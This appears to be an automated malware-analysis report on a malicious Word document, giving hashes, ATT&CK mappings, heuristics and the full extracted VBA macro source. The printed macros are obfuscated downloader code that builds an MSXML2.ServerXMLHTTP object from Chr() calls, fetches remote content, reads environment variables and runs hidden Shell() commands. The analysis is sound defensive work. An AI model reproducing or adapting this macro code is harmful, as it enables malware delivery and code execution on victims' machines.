Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5769f3fc967233b7…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 104.0 KB
Created: 2015-07-27 20:08:00
Authoring application: Microsoft Office Word
First seen: 2019-04-17
MD5: c0b7f52427f1369751927728f09f520c
SHA-1: 2d57f03fc4ef2655357aaf1981ebbb00994dd06e
SHA-256: 5769f3fc967233b7a76a0247d5a180f63427d03970f7b8789ae3d345d68df1ef
Risk score: 170

Malware Insights

MITRE ATT&CK
  • T1566.001 Spearphishing Attachment
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1140 Deobfuscate/Decode Files or Information

The sample contains VBA macros that use `Shell()` and `CreateObject()`, indicating an attempt to execute arbitrary code. The VBA script attempts to download content from a URL through an `MSXML2.ServerXMLHTTP` object created with `CreateObject`, assembling the ProgID from `Chr()` calls at runtime. The document body presents a lure to encourage macro execution. The presence of `Environ()` calls suggests interaction with environment variables.

Heuristics 7

  • VBA macros detected (medium; 3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA (critical) OLE_VBA_SHELL
  • CreateObject call (high) OLE_VBA_CREATEOBJ
  • Environ() call, environment variable access (low) OLE_VBA_ENVIRON
  • Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure (medium) SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Every URL below was found in the document text (OLE body); they are XML namespace identifiers of the kind carried in embedded-image metadata (XMP/RDF, Dublin Core, DrawingML) rather than addresses used by the macro code, which receives its download URL as a function parameter.
    • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    • http://ns.adobe.com/exif/1.0/ (in document text, OLE body)
    • http://ns.adobe.com/tiff/1.0/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
    • http://purl.org/dc/elements/1.1/ (in document text, OLE body)
    • http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/rights/ (in document text, OLE body)
    • http://www.iec.ch (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3554 bytes
SHA-256: 8a499abb5bf0aa9ba72b8cc7b9151cf5e1ca98f44127612f7665f3ca47641c0f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Public Function Xjdkhjfwefw(a As Object)
Xjdkhjfwefw = (a.responseText)
End Function
 
Attribute VB_Name = "Module2"
 
Public Function Goabc(sps As String)
BHJQVDQWVSS = "g21he 2g1hcf1c12e"
BHJQVDQWVSS = "g21he 2g1hcf1c12e"
BHJQVDQWVSS = "g21he 2g1hcf1c12e"
Goabc = Environ(sps)
End Function
Public Function Linolium(nbqjbdjqw As String)
Dim dhjqwqkjww As Integer, aaqjwhdq As Integer, VjwiqdhqkwjHJhjkahsdjsakDD As Object, AHUDWQI As String
Dim ashdUHhda As String, hausd As Integer, JQHWDJQWB As String
ashdUHhda = nbqjbdjqw
hausd = Tan(11) + 225
'asdsad
JQHWDJQWB = "E"
JQHWDJQWB = "G" + JQHWDJQWB + Chr(88 + 4 * hausd)
BQDHJQWDGWQJGS = "MS" + Chr(93 + 5 * hausd) + "ML2.ServerXMLH" & Chr(85 + hausd) & Chr(84) & Chr(80)
'Hukqjdhjksahd
Set VjwiqdhqkwjHJhjkahsdjsakDD = CreateObject(BQDHJQWDGWQJGS)
VjwiqdhqkwjHJhjkahsdjsakDD.Open JQHWDJQWB, ashdUHhda
VjwiqdhqkwjHJhjkahsdjsakDD.Send (AHUDWQI)
Linolium = Module1.Xjdkhjfwefw(VjwiqdhqkwjHJhjkahsdjsakDD)
End Function
Sub Crispy(NumOfSeconds As Long)
Dim SngSec As Long
SngSec = Timer + NumOfSeconds
Do While Timer < SngSec
DoEvents
Loop
End Sub

Attribute VB_Name = "Module3"
 
Public Function India(dnuwhd As String, b As String, c As Integer)
Dim telnasdhS As String
ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
Dim kkqhwdjbqhjdwqbdhjqwbdjqsd As Range, aaHRjkasnjkdaksbdasdsd As Range
Set kkqhwdjbqhjdwqbdhjqwbdjqsd = ActiveDocument.Range
ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1qhwdjko2ej1l2kje k2l1"
ASJDQDBBBNS = "2jke hjk1g hj12ge1asjdqk2 e1o2ej1l2kje k2l1"
ASJADQDBBBNS = "2jke hjk1g hhdjkqwj12ge1k2 e1o2ej1l2kje k2l1"
AFWSJDQDBBBNS = "2jke hjbasjdk1g hj12ge1k2 e1o2ej1l2kje k2l1"
With kkqhwdjbqhjdwqbdhjqwbdjqsd.Find
'ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
'ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
'ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
'ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
.Text = dnuwhd
.MatchWholeWord = True
kkqhwdjbqhjdwqbdhjqwbdjqsd.Find.Execute
kkqhwdjbqhjdwqbdhjqwbdjqsd.Collapse direction:=wdCollapseEnd
Dim wdwq As String
Set aaHRjkasnjkdaksbdasdsd = ActiveDocument.Range
Dim wdsadwq As String
aaHRjkasnjkdaksbdasdsd.Start = kkqhwdjbqhjdwqbdhjqwbdjqsd.End
.Text = b
.MatchWholeWord = True
.Execute
ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
kkqhwdjbqhjdwqbdhjqwbdjqsd.Collapse direction:=wdCollapseStart
aaHRjkasnjkdaksbdasdsd.End = kkqhwdjbqhjdwqbdhjqwbdjqsd.Start

If (c = 1) Then
    telnasdhS = aaHRjkasnjkdaksbdasdsd.Delete
End If
If (c = 2) Then
    aaHRjkasnjkdaksbdasdsd.Font.Color = wdColorBlack
End If

Dim hduwaa As Integer
hduwaa = 1 - 2 ^ 4

QHUDW = Chr(5 + 5 + 23 + Sgn(hduwaa))

If (c = 3) Then
    With kkqhwdjbqhjdwqbdhjqwbdjqsd.Find
    .Text = a
    .Replacement.Text = QHUDW
    'ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
    'ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
    'ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
    'ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
    .Wrap = wdFindContinue
    .Execute Replace:=wdReplaceAll
    End With
End If

End With
End Function

Public Function HowEver(hqwdugqw As Variant, hasdgja)
VHJWDQ = "b2nme2b1 hgj12hg21jhg e"
hqwdugqw = Shell(hasdgja, 0)
HowEver = hqwdugqw
End Function